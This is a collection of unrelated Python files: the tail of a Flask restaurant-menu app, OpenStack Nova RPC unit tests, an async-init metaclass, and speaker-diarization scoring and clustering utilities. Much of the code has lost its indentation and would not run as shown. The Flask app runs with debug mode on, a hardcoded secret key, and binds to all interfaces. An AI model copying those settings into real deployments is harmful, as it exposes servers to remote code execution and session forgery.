    # Fall back to the first restaurant when the bare '/' route is used
    if restaurant_id is None:
        restaurant = session.query(Restaurant).first()
    else:
        restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()
    items = session.query(MenuItem).filter_by(restaurant_id=restaurant.id)
    return render_template('menu.html', restaurant=restaurant, items=items)
@app.route('/restaurants/<int:restaurant_id>/new', methods=['GET', 'POST'])
def new_Menu_Item(restaurant_id):
if request.method == 'POST':
new_item = MenuItem(name = request.form['name'], restaurant_id = restaurant_id)
session.add(new_item)
session.commit()
flash("new menu item created!")
return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))
else:
return render_template('newmenuitem.html', restaurant_id=restaurant_id)
@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit', methods=['GET', 'POST'])
def edit_Menu_Item(restaurant_id, menu_id):
editedItem = session.query(MenuItem).filter_by(id=menu_id).one()
if request.method == 'POST':
if request.form['description']:
editedItem.description = request.form['description']
if request.form['price']:
editedItem.price = request.form['price']
session.add(editedItem)
session.commit()
flash("menu item edited!")
return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))
else:
return render_template(
'editmenuitem.html', restaurant_id=restaurant_id, menu_id=menu_id, item=editedItem)
@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/delete', methods=['GET', 'POST'])
def delete_Menu_Item(restaurant_id, menu_id):
deletedItem = session.query(MenuItem).filter_by(id=menu_id).one()
if request.method == 'POST':
session.delete(deletedItem)
session.commit()
flash("menu item deleted!")
return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))
else:
return render_template(
'deletemenuitem.html', restaurant_id=restaurant_id, menu_id=menu_id, item=deletedItem)
return "delete successful"
if __name__ == '__main__':
app.secret_key = "secret_key"
app.debug = True
app.run(host='0.0.0.0', port=5000)
|
# Copyright 2016 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import oslo_messaging as messaging
from oslo_messaging.rpc import dispatcher
from oslo_serialization import jsonutils
import nova.conf
from nova import context
from nova import rpc
from nova import test
CONF = nova.conf.CONF
class TestRPC(test.NoDBTestCase):
# We're testing the rpc code so we can't use the RPCFixture.
STUB_RPC = False
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT')
@mock.patch.object(rpc, 'LEGACY_NOTIFIER')
@mock.patch.object(rpc, 'NOTIFIER')
@mock.patch.object(rpc, 'get_allowed_exmods')
@mock.patch.object(rpc, 'RequestContextSerializer')
@mock.patch.object(messaging, 'get_notification_transport')
@mock.patch.object(messaging, 'Notifier')
def _test_init(self, notification_format, expected_driver_topic_kwargs,
mock_notif, mock_noti_trans, mock_ser, mock_exmods,
mock_NOTIFIER, mock_LEGACY_NOTIFIER, mock_NOTIFICATION_TRANSPORT,
mock_TRANSPORT,
versioned_notifications_topics=None):
if not versioned_notifications_topics:
versioned_notifications_topics = ['versioned_notifications']
self.flags(
notification_format=notification_format,
versioned_notifications_topics=versioned_notifications_topics,
group='notifications')
legacy_notifier = mock.Mock()
notifier = mock.Mock()
notif_transport = mock.Mock()
transport = mock.Mock()
serializer = mock.Mock()
mock_exmods.return_value = ['foo']
mock_noti_trans.return_value = notif_transport
mock_ser.return_value = serializer
mock_notif.side_effect = [legacy_notifier, notifier]
with mock.patch.object(rpc, 'create_transport') as create_transport, \
mock.patch.object(rpc, 'get_transport_url') as get_url:
create_transport.return_value = transport
rpc.init(CONF)
create_transport.assert_called_once_with(get_url.return_value)
self.assertTrue(mock_exmods.called)
self.assertIsNotNone(mock_TRANSPORT)
self.assertIsNotNone(mock_LEGACY_NOTIFIER)
self.assertIsNotNone(mock_NOTIFIER)
self.assertEqual(legacy_notifier, rpc.LEGACY_NOTIFIER)
self.assertEqual(notifier, rpc.NOTIFIER)
expected_calls = []
for kwargs in expected_driver_topic_kwargs:
expected_kwargs = {'serializer': serializer}
expected_kwargs.update(kwargs)
expected_calls.append(((notif_transport,), expected_kwargs))
self.assertEqual(expected_calls, mock_notif.call_args_list,
"The calls to messaging.Notifier() did not create "
"the legacy and versioned notifiers properly.")
def test_init_unversioned(self):
# The expected call to get the legacy notifier will require no new
# kwargs, and we expect the new notifier will need the noop driver
expected_driver_topic_kwargs = [{}, {'driver': 'noop'}]
self._test_init('unversioned', expected_driver_topic_kwargs)
def test_init_both(self):
expected_driver_topic_kwargs = [
{},
{'topics': ['versioned_notifications']}]
self._test_init('both', expected_driver_topic_kwargs)
def test_init_versioned(self):
expected_driver_topic_kwargs = [
{'driver': 'noop'},
{'topics': ['versioned_notifications']}]
self._test_init('versioned', expected_driver_topic_kwargs)
def test_init_versioned_with_custom_topics(self):
expected_driver_topic_kwargs = [
{'driver': 'noop'},
{'topics': ['custom_topic1', 'custom_topic2']}]
versioned_notifications_topics = ['custom_topic1', 'custom_topic2']
self._test_init('versioned', expected_driver_topic_kwargs,
versioned_notifications_topics=versioned_notifications_topics)
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'LEGACY_NOTIFIER', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFIER', new=mock.Mock())
def test_cleanup_transport_null(self):
"""Ensure cleanup fails if 'rpc.TRANSPORT' wasn't set."""
self.assertRaises(AssertionError, rpc.cleanup)
@mock.patch.object(rpc, 'TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'LEGACY_NOTIFIER', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFIER', new=mock.Mock())
def test_cleanup_notification_transport_null(self):
"""Ensure cleanup fails if 'rpc.NOTIFICATION_TRANSPORT' wasn't set."""
self.assertRaises(AssertionError, rpc.cleanup)
@mock.patch.object(rpc, 'TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFIER', new=mock.Mock())
def test_cleanup_legacy_notifier_null(self):
"""Ensure cleanup fails if 'rpc.LEGACY_NOTIFIER' wasn't set."""
self.assertRaises(AssertionError, rpc.cleanup)
@mock.patch.object(rpc, 'TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'LEGACY_NOTIFIER', new=mock.Mock())
def test_cleanup_notifier_null(self):
"""Ensure cleanup fails if 'rpc.NOTIFIER' wasn't set."""
self.assertRaises(AssertionError, rpc.cleanup)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT')
@mock.patch.object(rpc, 'LEGACY_NOTIFIER')
@mock.patch.object(rpc, 'NOTIFIER')
def test_cleanup(self, mock_NOTIFIER, mock_LEGACY_NOTIFIER,
mock_NOTIFICATION_TRANSPORT, mock_TRANSPORT):
rpc.cleanup()
mock_TRANSPORT.cleanup.assert_called_once_with()
mock_NOTIFICATION_TRANSPORT.cleanup.assert_called_once_with()
self.assertIsNone(rpc.TRANSPORT)
self.assertIsNone(rpc.NOTIFICATION_TRANSPORT)
self.assertIsNone(rpc.LEGACY_NOTIFIER)
self.assertIsNone(rpc.NOTIFIER)
@mock.patch.object(messaging, 'set_transport_defaults')
def test_set_defaults(self, mock_set):
control_exchange = mock.Mock()
rpc.set_defaults(control_exchange)
mock_set.assert_called_once_with(control_exchange)
def test_add_extra_exmods(self):
extra_exmods = []
with mock.patch.object(
rpc, 'EXTRA_EXMODS', extra_exmods) as mock_EXTRA_EXMODS:
rpc.add_extra_exmods('foo', 'bar')
self.assertEqual(['foo', 'bar'], mock_EXTRA_EXMODS)
def test_clear_extra_exmods(self):
extra_exmods = ['foo', 'bar']
with mock.patch.object(
rpc, 'EXTRA_EXMODS', extra_exmods) as mock_EXTRA_EXMODS:
rpc.clear_extra_exmods()
self.assertEqual([], mock_EXTRA_EXMODS)
def test_get_allowed_exmods(self):
allowed_exmods = ['foo']
extra_exmods = ['bar']
with test.nested(
mock.patch.object(rpc, 'EXTRA_EXMODS', extra_exmods),
mock.patch.object(rpc, 'ALLOWED_EXMODS', allowed_exmods)
) as (mock_EXTRA_EXMODS, mock_ALLOWED_EXMODS):
exmods = rpc.get_allowed_exmods()
self.assertEqual(['foo', 'bar'], exmods)
@mock.patch.object(messaging, 'TransportURL')
def test_get_transport_url(self, mock_url):
mock_url.parse.return_value = 'foo'
url = rpc.get_transport_url(url_str='bar')
self.assertEqual('foo', url)
mock_url.parse.assert_called_once_with(rpc.CONF, 'bar')
@mock.patch.object(messaging, 'TransportURL')
def test_get_transport_url_null(self, mock_url):
mock_url.parse.return_value = 'foo'
url = rpc.get_transport_url()
self.assertEqual('foo', url)
mock_url.parse.assert_called_once_with(rpc.CONF, None)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'profiler', None)
@mock.patch.object(rpc, 'RequestContextSerializer')
@mock.patch.object(messaging, 'RPCClient')
def test_get_client(self, mock_client, mock_ser, mock_TRANSPORT):
tgt = mock.Mock()
ser = mock.Mock()
mock_client.return_value = 'client'
mock_ser.return_value = ser
client = rpc.get_client(tgt, version_cap='1.0', serializer='foo')
mock_ser.assert_called_once_with('foo')
mock_client.assert_called_once_with(mock_TRANSPORT,
tgt, version_cap='1.0',
call_monitor_timeout=None,
serializer=ser)
self.assertEqual('client', client)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'profiler', None)
@mock.patch.object(rpc, 'RequestContextSerializer')
@mock.patch.object(messaging, 'get_rpc_server')
def test_get_server(self, mock_get, mock_ser, mock_TRANSPORT):
ser = mock.Mock()
tgt = mock.Mock()
ends = mock.Mock()
mock_ser.return_value = ser
mock_get.return_value = 'server'
server = rpc.get_server(tgt, ends, serializer='foo')
mock_ser.assert_called_once_with('foo')
access_policy = dispatcher.DefaultRPCAccessPolicy
mock_get.assert_called_once_with(mock_TRANSPORT, tgt, ends,
executor='eventlet', serializer=ser,
access_policy=access_policy)
self.assertEqual('server', server)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'profiler', mock.Mock())
@mock.patch.object(rpc, 'ProfilerRequestContextSerializer')
@mock.patch.object(messaging, 'RPCClient')
def test_get_client_profiler_enabled(self, mock_client, mock_ser,
mock_TRANSPORT):
tgt = mock.Mock()
ser = mock.Mock()
mock_client.return_value = 'client'
mock_ser.return_value = ser
client = rpc.get_client(tgt, version_cap='1.0', serializer='foo')
mock_ser.assert_called_once_with('foo')
mock_client.assert_called_once_with(mock_TRANSPORT,
tgt, version_cap='1.0',
call_monitor_timeout=None,
serializer=ser)
self.assertEqual('client', client)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'profiler', mock.Mock())
@mock.patch.object(rpc, 'ProfilerRequestContextSerializer')
@mock.patch.object(messaging, 'get_rpc_server')
def test_get_server_profiler_enabled(self, mock_get, mock_ser,
mock_TRANSPORT):
ser = mock.Mock()
tgt = mock.Mock()
ends = mock.Mock()
mock_ser.return_value = ser
mock_get.return_value = 'server'
server = rpc.get_server(tgt, ends, serializer='foo')
mock_ser.assert_called_once_with('foo')
access_policy = dispatcher.DefaultRPCAccessPolicy
mock_get.assert_called_once_with(mock_TRANSPORT, tgt, ends,
executor='eventlet', serializer=ser,
access_policy=access_policy)
self.assertEqual('server', server)
@mock.patch.object(rpc, 'LEGACY_NOTIFIER')
def test_get_notifier(self, mock_LEGACY_NOTIFIER):
mock_prep = mock.Mock()
mock_prep.return_value = 'notifier'
mock_LEGACY_NOTIFIER.prepare = mock_prep
notifier = rpc.get_notifier('service', publisher_id='foo')
mock_prep.assert_called_once_with(publisher_id='foo')
self.assertIsInstance(notifier, rpc.LegacyValidatingNotifier)
self.assertEqual('notifier', notifier.notifier)
@mock.patch.object(rpc, 'LEGACY_NOTIFIER')
def test_get_notifier_null_publisher(self, mock_LEGACY_NOTIFIER):
mock_prep = mock.Mock()
mock_prep.return_value = 'notifier'
mock_LEGACY_NOTIFIER.prepare = mock_prep
notifier = rpc.get_notifier('service', host='bar')
mock_prep.assert_called_once_with(publisher_id='service.bar')
self.assertIsInstance(notifier, rpc.LegacyValidatingNotifier)
self.assertEqual('notifier', notifier.notifier)
@mock.patch.object(rpc, 'NOTIFIER')
def test_get_versioned_notifier(self, mock_NOTIFIER):
mock_prep = mock.Mock()
mock_prep.return_value = 'notifier'
mock_NOTIFIER.prepare = mock_prep
notifier = rpc.get_versioned_notifier('service.foo')
mock_prep.assert_called_once_with(publisher_id='service.foo')
self.assertEqual('notifier', notifier)
@mock.patch.object(rpc, 'get_allowed_exmods')
@mock.patch.object(messaging, 'get_rpc_transport')
def test_create_transport(self, mock_transport, mock_exmods):
exmods = mock_exmods.return_value
transport = rpc.create_transport(mock.sentinel.url)
self.assertEqual(mock_transport.return_value, transport)
mock_exmods.assert_called_once_with()
mock_transport.assert_called_once_with(rpc.CONF,
url=mock.sentinel.url,
allowed_remote_exmods=exmods)
class TestJsonPayloadSerializer(test.NoDBTestCase):
def test_serialize_entity(self):
serializer = rpc.JsonPayloadSerializer()
with mock.patch.object(jsonutils, 'to_primitive') as mock_prim:
serializer.serialize_entity('context', 'entity')
mock_prim.assert_called_once_with('entity', convert_instances=True,
fallback=serializer.fallback)
def test_fallback(self):
# Convert RequestContext, should get a dict.
primitive = rpc.JsonPayloadSerializer.fallback(context.get_context())
self.assertIsInstance(primitive, dict)
# Convert anything else, should get a string.
primitive = rpc.JsonPayloadSerializer.fallback(mock.sentinel.entity)
self.assertIsInstance(primitive, str)
class TestRequestContextSerializer(test.NoDBTestCase):
def setUp(self):
super(TestRequestContextSerializer, self).setUp()
self.mock_base = mock.Mock()
self.ser = rpc.RequestContextSerializer(self.mock_base)
self.ser_null = rpc.RequestContextSerializer(None)
def test_serialize_entity(self):
self.mock_base.serialize_entity.return_value = 'foo'
ser_ent = self.ser.serialize_entity('context', 'entity')
self.mock_base.serialize_entity.assert_called_once_with('context',
'entity')
self.assertEqual('foo', ser_ent)
def test_serialize_entity_null_base(self):
ser_ent = self.ser_null.serialize_entity('context', 'entity')
self.assertEqual('entity', ser_ent)
def test_deserialize_entity(self):
self.mock_base.deserialize_entity.return_value = 'foo'
deser_ent = self.ser.deserialize_entity('context', 'entity')
self.mock_base.deserialize_entity.assert_called_once_with('context',
'entity')
self.assertEqual('foo', deser_ent)
def test_deserialize_entity_null_base(self):
deser_ent = self.ser_null.deserialize_entity('context', 'entity')
self.assertEqual('entity', deser_ent)
def test_serialize_context(self):
context = mock.Mock()
self.ser.serialize_context(context)
context.to_dict.assert_called_once_with()
@mock.patch.object(context, 'RequestContext')
def test_deserialize_context(self, mock_req):
self.ser.deserialize_context('context')
mock_req.from_dict.assert_called_once_with('context')
class TestProfilerRequestContextSerializer(test.NoDBTestCase):
def setUp(self):
super(TestProfilerRequestContextSerializer, self).setUp()
self.ser = rpc.ProfilerRequestContextSerializer(mock.Mock())
@mock.patch('nova.rpc.profiler')
def test_serialize_context(self, mock_profiler):
prof = mock_profiler.get.return_value
prof.hmac_key = 'swordfish'
prof.get_base_id.return_value = 'baseid'
prof.get_id.return_value = 'parentid'
context = mock.Mock()
context.to_dict.return_value = {'project_id': 'test'}
self.assertEqual({'project_id': 'test',
'trace_info': {
'hmac_key': 'swordfish',
'base_id': 'baseid',
'parent_id': 'parentid'}},
self.ser.serialize_context(context))
@mock.patch('nova.rpc.profiler')
def test_deserialize_context(self, mock_profiler):
serialized = {'project_id': 'test',
'trace_info': {
'hmac_key': 'swordfish',
'base_id': 'baseid',
'parent_id': 'parentid'}}
context = self.ser.deserialize_context(serialized)
self.assertEqual('test', context.project_id)
mock_profiler.init.assert_called_once_with(
hmac_key='swordfish', base_id='baseid', parent_id='parentid')
class TestClientRouter(test.NoDBTestCase):
@mock.patch('oslo_messaging.RPCClient')
def test_by_instance(self, mock_rpcclient):
default_client = mock.Mock()
cell_client = mock.Mock()
mock_rpcclient.return_value = cell_client
ctxt = mock.Mock()
ctxt.mq_connection = mock.sentinel.transport
router = rpc.ClientRouter(default_client)
client = router.client(ctxt)
# verify a client was created by ClientRouter
mock_rpcclient.assert_called_once_with(
mock.sentinel.transport, default_client.target,
version_cap=default_client.version_cap,
call_monitor_timeout=default_client.call_monitor_timeout,
serializer=default_client.serializer)
# verify cell client was returned
self.assertEqual(cell_client, client)
@mock.patch('oslo_messaging.RPCClient')
def test_by_instance_untargeted(self, mock_rpcclient):
default_client = mock.Mock()
cell_client = mock.Mock()
mock_rpcclient.return_value = cell_client
ctxt = mock.Mock()
ctxt.mq_connection = None
router = rpc.ClientRouter(default_client)
client = router.client(ctxt)
self.assertEqual(router.default_client, client)
self.assertFalse(mock_rpcclient.called)
class TestIsNotificationsEnabledDecorator(test.NoDBTestCase):
def setUp(self):
super(TestIsNotificationsEnabledDecorator, self).setUp()
self.f = mock.Mock()
self.f.__name__ = 'f'
self.decorated = rpc.if_notifications_enabled(self.f)
def test_call_func_if_needed(self):
self.decorated()
self.f.assert_called_once_with()
@mock.patch('nova.rpc.NOTIFIER.is_enabled', return_value=False)
def test_not_call_func_if_notifier_disabled(self, mock_is_enabled):
self.decorated()
self.assertEqual(0, len(self.f.mock_calls))
def test_not_call_func_if_only_unversioned_notifications_requested(self):
self.flags(notification_format='unversioned', group='notifications')
self.decorated()
self.assertEqual(0, len(self.f.mock_calls))
|
"""Work derived from curio written by David Beazley.
Reference:
https://github.com/dabeaz/curio/blob/3d610aea866178800b1e5dbf5cfef8210418fb58/curio/meta.py
Removed in:
https://github.com/dabeaz/curio/commit/66c60fec61610ae386bc03717724e6438948a419
See original licenses in:
https://github.com/dabeaz/curio/blob/3d610aea866178800b1e5dbf5cfef8210418fb58/LICENSE
"""
# Internal
import typing as T
import inspect
# Project
from .async_abc import AsyncABCMeta
# Generic types
K = T.TypeVar("K")
class AsyncObjectMeta(AsyncABCMeta):
"""
Metaclass that allows for asynchronous instance initialization and the
__init__() method to be defined as a coroutine. Usage:
    class Spam(metaclass=AsyncObjectMeta):
async def __init__(self, x, y):
self.x = x
self.y = y
async def main():
s = await Spam(2, 3)
...
"""
@staticmethod
def __new__(
mcs: T.Type["AsyncObjectMeta"],
name: str,
bases: T.Tuple[type, ...],
namespace: T.Dict[str, T.Any],
) -> "AsyncObjectMeta":
if "__init__" in namespace and not inspect.iscoroutinefunction(namespace["__init__"]):
raise TypeError("__init__ must be a coroutine")
return super().__new__(mcs, name, bases, namespace) # type: ignore
async def __call__(cls: T.Type[K], *args: T.Any, **kwargs: T.Any) -> K:
self: K = cls.__new__(cls, *args, **kwargs) # type: ignore
await self.__init__(*args, **kwargs) # type: ignore
return self
class AsyncObject(metaclass=AsyncObjectMeta):
pass
__all__ = ("AsyncObjectMeta", "AsyncObject")
|
#!/usr/bin/env python
# Copyright 2013-2019 Lukas Burget, Mireia Diez (burget@fit.vutbr.cz, mireia@fit.vutbr.cz)
# Licensed under the Apache License, Version 2.0 (the "License")
import numpy as np
import scipy.linalg as spl
import errno, os
from scipy.special import softmax
def twoGMMcalib_lin(s, niters=20):
"""
Train two-Gaussian GMM with shared variance for calibration of scores 's'
    Returns the threshold for original scores 's' that "separates" the two Gaussians
    and an array of linearly calibrated log odds ratio scores.
"""
weights = np.array([0.5, 0.5])
means = np.mean(s) + np.std(s) * np.array([-1, 1])
var = np.var(s)
threshold = np.inf
for _ in range(niters):
lls = np.log(weights)-0.5*np.log(var) - 0.5*(s[:,np.newaxis]-means)**2/var
gammas = softmax(lls, axis=1)
cnts = np.sum(gammas, axis=0)
weights = cnts / cnts.sum()
means = s.dot(gammas) / cnts
var = ((s**2).dot(gammas) / cnts - means**2).dot(weights)
threshold = -0.5*(np.log(weights**2/var)-means**2/var).dot([1,-1])/(means/var).dot([1,-1])
return threshold, lls[:,means.argmax()]-lls[:,means.argmin()]
def AHC(sim_mx, threshold=0):
""" Performs UPGMA variant (wikipedia.org/wiki/UPGMA) of Agglomerative
Hierarchical Clustering using the input pairwise similarity matrix.
Input:
sim_mx - NxN pairwise similarity matrix
threshold - threshold for stopping the clustering algorithm
(see function twoGMMcalib_lin for its estimation)
Output:
cluster labels stored in an array of length N containing (integers in
        the range from 0 to C-1, where C is the number of discovered clusters)
"""
    dist = -sim_mx
dist[np.diag_indices_from(dist)] = np.inf
clsts = [[i] for i in range(len(dist))]
while True:
mi, mj = np.sort(np.unravel_index(dist.argmin(), dist.shape))
if dist[mi, mj] > -threshold:
break
dist[:, mi] = dist[mi,:] = (dist[mi,:]*len(clsts[mi])+dist[mj,:]*len(clsts[mj]))/(len(clsts[mi])+len(clsts[mj]))
dist[:, mj] = dist[mj,:] = np.inf
clsts[mi].extend(clsts[mj])
clsts[mj] = None
    labs = np.empty(len(dist), dtype=int)
for i, c in enumerate([e for e in clsts if e]):
labs[c] = i
return labs
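# A minimal sketch of how the two functions above are typically combined
# (assuming `sim_mx` is an NxN pairwise similarity matrix between x-vectors):
#
#     thr, _ = twoGMMcalib_lin(sim_mx.ravel())
#     labels = AHC(sim_mx, threshold=thr)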
def PLDA_scoring_in_LDA_space(Fe, Ft, diagAC):
""" Produces matrix of pairwise log likelihood ratio scores evaluated using
PLDA model for enrollment (i-/x-)vectors Fe and test vectors Ft, which are
mean normalized (or centered) and transformed by LDA-transformation
(i.e. within-class covariance matrix is identity and across-class covariance
matrix is diagonal).
Input:
Fe - NxD matrix of enrollment vectors (in rows)
Ft - MxD matrix of test vectors (in rows)
diagAC - D-dimensional diagonal of across class covariance matrix
Output:
out - NxM matrix of log likelihood ratio scores
"""
# See (7-8) in L. Burget et al.: "Discriminatively trained probabilistic
# linear discriminant analysis for speaker verification", in ICASSP 2011.
iTC = 1.0 / (1 + diagAC)
iWC2AC = 1.0 / (1 + 2*diagAC)
ldTC = np.sum(np.log(1 + diagAC))
ldWC2AC = np.sum(np.log(1 + 2*diagAC))
Gamma = -0.25*(iWC2AC + 1 - 2*iTC)
Lambda= -0.5 *(iWC2AC - 1)
k = - 0.5*(ldWC2AC - 2*ldTC)
return np.dot(Fe * Lambda, Ft.T) + (Fe**2).dot(Gamma)[:,np.newaxis] + (Ft**2).dot(Gamma) + k
def kaldi_ivector_plda_scoring_dense(kaldi_plda, x, target_energy=0.1, pca_dim=None):
""" Given input array of N x-vectors and pretrained PLDA model, this function
calculates NxN matrix of pairwise similarity scores for the following AHC
clustering. This function produces exactly the same similarity scores as the
standard kaldi diarization recipe.
Input:
kaldi_plda - PLDA model using the kaldi parametrization (mu, tr, psi)
as loaded by 'read_plda' function.
x - matrix of x-vectors (NxR)
target_energy - Before calculating the similarity matrix, PCA is estimated
                      on the input x-vectors. The x-vectors (and PLDA model) are
                      then projected into a low-dimensional space preserving at
                      least 'target_energy' variability in the x-vectors.
pca_dim - This parameter overwrites 'target_energy' and directly
specifies the PCA target dimensionality.
Output:
matrix of pairwise similarities between the input x-vectors
"""
plda_mu, plda_tr, plda_psi = kaldi_plda
[energy,PCA]=spl.eigh(np.cov(x.T, bias=True))
if pca_dim is None:
energy=np.cumsum(energy[::-1])
pca_dim=np.sum(energy/energy[-1]<=target_energy) + 2
# we need at least 2 dimensions, so 2 more dimensions are always added
PCA=PCA[:,:-pca_dim-1:-1]
print("pca_dim:", pca_dim)
plda_tr_inv_pca=PCA.T.dot(np.linalg.inv(plda_tr))
W = plda_tr_inv_pca.dot(plda_tr_inv_pca.T)
B = (plda_tr_inv_pca*plda_psi).dot(plda_tr_inv_pca.T)
acvar, wccn = spl.eigh(B, W)
x = np.dot(x-plda_mu,PCA).dot(wccn)
x *= np.sqrt(x.shape[1] / np.dot(x**2, 1.0 / (acvar + 1.0)))[:,np.newaxis] # kaldi style length-norm
#Lambda, Gamma, c, k = PLDA_params_to_bilinear_form(np.eye(pca_dim), np.diag(acvar), np.zeros((pca_dim,)))
#return bilinear_scoring(Lambda, Gamma, c, k, x, x)
return PLDA_scoring_in_LDA_space(x, x, acvar)
def read_xvector_timing_dict(kaldi_segments):
""" Loads kaldi 'segments' file with the timing information for individual x-vectors.
Each line of the 'segments' file is expected to contain the following fields:
      - x-vector name (which needs to match the names of x-vectors loaded from kaldi archive)
- file name of the recording from which the xvector is extracted
- start time
- end time
Input:
kaldi_segments - path (including file name) to the Kaldi 'segments' file
Outputs:
segs_dict[recording_file_name] = (array_of_xvector_names, array_of_start_and_end_times)
"""
segs = np.loadtxt(kaldi_segments, dtype=object)
split_by_filename = np.nonzero(segs[1:,1]!=segs[:-1,1])[0]+1
return {s[0,1]: (s[:,0], s[:,2:].astype(float)) for s in np.split(segs, split_by_filename)}
def merge_adjacent_labels(starts, ends, labels):
""" Labeled segments defined as start and end times are compacted in such a way that
adjacent or overlapping segments with the same label are merged. Overlapping
segments with different labels are further adjusted not to overlap (the boundary
is set in the middle of the original overlap).
Input:
starts - array of segment start times in seconds
ends - array of segment end times in seconds
labels - array of segment labels (of any type)
Outputs:
      starts, ends, labels - compacted and adjusted version of the input arrays
"""
    # Merge neighbouring (or overlapping) segments with the same label
adjacent_or_overlap = np.logical_or(np.isclose(ends[:-1], starts[1:]), ends[:-1] > starts[1:])
to_split = np.nonzero(np.logical_or(~adjacent_or_overlap, labels[1:] != labels[:-1]))[0]
starts = starts[np.r_[0, to_split+1]]
ends = ends[np.r_[to_split, -1]]
labels = labels[np.r_[0, to_split+1]]
# Fix starts and ends times for overlapping segments
overlaping = np.nonzero(starts[1:]<ends[:-1])[0]
ends[overlaping] = starts[overlaping+1] = (ends[overlaping]+starts[overlaping+1]) / 2.0
return starts, ends, labels
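# Illustrative sketch: two adjacent 'A' segments are merged, and the overlap between
# 'A' and 'B' is resolved by placing the boundary in the middle of the overlap.
def _demo_merge_adjacent_labels():
    starts = np.array([0.0, 1.0, 1.5])
    ends = np.array([1.0, 2.0, 3.0])
    labels = np.array(["A", "A", "B"])
    # -> starts [0.0, 1.75], ends [1.75, 3.0], labels ['A', 'B']
    return merge_adjacent_labels(starts, ends, labels)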
def segment_to_frame_labels(starts, ends, labels, length=0, frame_rate=100., empty_label=None):
""" Obtain frame-by-frame labels from labeled segments defined by start and end times
Input:
starts - array of segment start times in seconds
ends - array of segment end times in seconds
labels - array of segment labels (of any type)
      length: Output array is truncated or augmented (with 'empty_label' values) to have this length.
              For negative 'length', it will only be augmented if shorter than '-length'.
              By default (length=0), the last element of the 'ends' array determines the length of the output.
frame_rate: frame rate of the output array (in frames per second)
Outputs:
frms - array of frame-by-frame labels
"""
min_len, max_len = (length, length) if length > 0 else (-length, None)
starts = np.rint(frame_rate*starts).astype(int)
ends = np.rint(frame_rate*ends ).astype(int)
if not ends.size:
return np.full(min_len, empty_label)
frms = np.repeat(np.r_[np.c_[[empty_label]*len(labels), labels ].flat, empty_label],
np.r_[np.c_[starts - np.r_[0, ends[:-1]], ends-starts].flat, max(0, min_len-ends[-1])])
return frms[:max_len]
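# Illustrative sketch: at frame_rate=100, a segment 0.00-0.02 s labelled 1 and a
# segment 0.03-0.05 s labelled 2 become the frame labels [1, 1, None, 2, 2].
def _demo_segment_to_frame_labels():
    return segment_to_frame_labels(np.array([0.00, 0.03]),
                                   np.array([0.02, 0.05]),
                                   np.array([1, 2]))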
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def l2_norm(vec_or_matrix):
""" L2 normalization of vector array.
Args:
vec_or_matrix (np.array): one vector or array of vectors
Returns:
np.array: normalized vector or array of normalized vectors
"""
if len(vec_or_matrix.shape) == 1:
# linear vector
return vec_or_matrix / np.linalg.norm(vec_or_matrix)
elif len(vec_or_matrix.shape) == 2:
return vec_or_matrix / np.linalg.norm(vec_or_matrix, axis=1, ord=2)[:, np.newaxis]
else:
raise ValueError('Wrong number of dimensions, 1 or 2 is supported, not %i.' % len(vec_or_matrix.shape))
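# Illustrative sketch: after l2_norm every row has unit Euclidean length.
def _demo_l2_norm():
    x = np.array([[3.0, 4.0], [0.0, 2.0]])
    normed = l2_norm(x)  # rows become [0.6, 0.8] and [0.0, 1.0]
    return np.linalg.norm(normed, axis=1)  # -> array([1., 1.])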
def cos_similarity(x):
"""Compute cosine similarity matrix in CPU & memory sensitive way
Args:
x (np.ndarray): embeddings, 2D array, embeddings are in rows
Returns:
np.ndarray: cosine similarity matrix
"""
assert x.ndim == 2, f'x has {x.ndim} dimensions, it must be matrix'
x = x / (np.sqrt(np.sum(np.square(x), axis=1, keepdims=True)) + 1.0e-32)
assert np.allclose(np.ones_like(x[:, 0]), np.sum(np.square(x), axis=1))
max_n_elm = 200000000
step = max(max_n_elm // (x.shape[0] * x.shape[0]), 1)
retval = np.zeros(shape=(x.shape[0], x.shape[0]), dtype=np.float64)
x0 = np.expand_dims(x, 0)
x1 = np.expand_dims(x, 1)
for i in range(0, x.shape[1], step):
product = x0[:, :, i:i+step] * x1[:, :, i:i+step]
retval += np.sum(product, axis=2, keepdims=False)
assert np.all(retval >= -1.0001), retval
assert np.all(retval <= 1.0001), retval
return retval
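# Illustrative sketch: the memory-friendly chunked computation matches the direct
# dot product of the row-normalized embeddings.
def _demo_cos_similarity():
    rng = np.random.RandomState(0)
    x = rng.randn(20, 8)
    direct = l2_norm(x).dot(l2_norm(x).T)
    return np.allclose(cos_similarity(x), direct)  # -> True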
|
"""GARET is Generic Average Reward Environment Testbed.
It is a special case of Bhatnagar et al.'s GARNET:
https://era.library.ualberta.ca/items/8fc4a1f6-95c9-4da8-aecd-96867babdf4c
